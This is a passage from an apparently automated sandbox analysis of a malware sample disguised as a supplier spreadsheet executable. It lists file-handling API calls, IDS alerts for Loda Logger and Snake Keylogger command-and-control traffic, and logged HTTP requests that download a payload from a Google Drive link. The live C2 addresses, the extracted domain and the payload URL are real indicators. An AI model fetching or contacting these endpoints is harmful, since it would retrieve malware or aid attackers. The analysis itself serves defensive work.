                                Source: RCXC902.tmp.0.drBinary or memory string: [autorun]
                                Source: RCXC902.tmp.0.drBinary or memory string: [autorun]
                                Source: RCXC902.tmp.0.drBinary or memory string: autorun.inf
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D8DD92
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DC2044
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DC219F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DC24A9
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00DB6B3F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00DB6E4A
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DBF350
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00DBFDD2
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBFD47 FindFirstFileW,FindClose,2_2_00DBFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00942044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00942044
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0094219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_0094219F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009424A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_009424A9
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00936B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00936B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00936E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00936E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_0093F350
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0090DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_0093FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093FD47 FindFirstFileW,FindClose,9_2_0093FD47
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: excel.exeMemory has grown: Private usage: 2MB later: 69MB

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.7:49728 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:49728 -> 172.111.138.100:5552
                                Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.7:49708 -> 69.42.215.252:80
                                Source: Network trafficSuricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.7:49728
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49709 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49712 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49716 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49705 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49704 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49715 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49721 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49736 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49748 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49723 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49764 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49737 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49763 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49771 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49749 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49772 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49786 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49799 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49800 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49808 -> 216.58.206.46:443
                                Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49785 -> 216.58.206.46:443
                                Source: Malware configuration extractorURLs: xred.mooo.com
                                Source: unknownDNS query: name: freedns.afraid.org
                                Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_00DC550C
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=EZXWRVeBCMz-PK-FvHfxSBKFsw3CYUsmjmuECmH6IAM7J4tw-CniUr10y50g_232SuMQE_HrSAdI6xQYflGNXz7YuCPiu-RhlPqKyVmHjpw0QaFUH4LNtQzQZgzkvd9aDBy-8TwTO6X_0qipmErZE1AHF6wWHVPqw7UeLuf7YEeRczYW7slgX_E
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
